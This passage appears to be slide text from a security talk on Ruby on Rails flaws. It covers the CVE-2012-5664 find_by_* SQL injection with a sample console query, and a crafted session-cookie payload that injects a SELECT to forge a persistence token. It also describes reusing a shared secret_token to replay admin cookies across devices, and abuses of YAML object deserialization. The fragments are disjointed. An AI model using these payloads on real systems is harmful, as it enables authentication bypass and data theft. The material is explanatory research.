• Unfortunately there is^Wwas a certain quirk in RoR with the find_by_* methods (also known as CVE-2012-5664): > User.find_by_id({:select =>"* from users limit 1 "}) User Load (0.5ms) SELECT * from users limit 1 FROM "users" WHERE "users"."id" IS NULL LIMIT 1 => #<User id: 1, [… all the fun stuff]
a lot (and even more do I): {"session_id" => "41414141", "user_credentials"=>"Phenoelit", "user_credentials_id"=>{ :select=> " *,\"Phenoelit\" as persistence_token from Users " }}
the same secret_token → Instant win • Buy one device, create admin account login as admin. • Observe session cookie • Reuse session cookie against all the other devices =)
Constructor is bypassed – Objects are allocated and instance variables are set • So, what if: – One can YAML.encode some Object out of the Rails std. Library which implements a custom [] method – Railsapp thinks it has an Hash object and calls [“somemember”] on it – => things might go wrong ™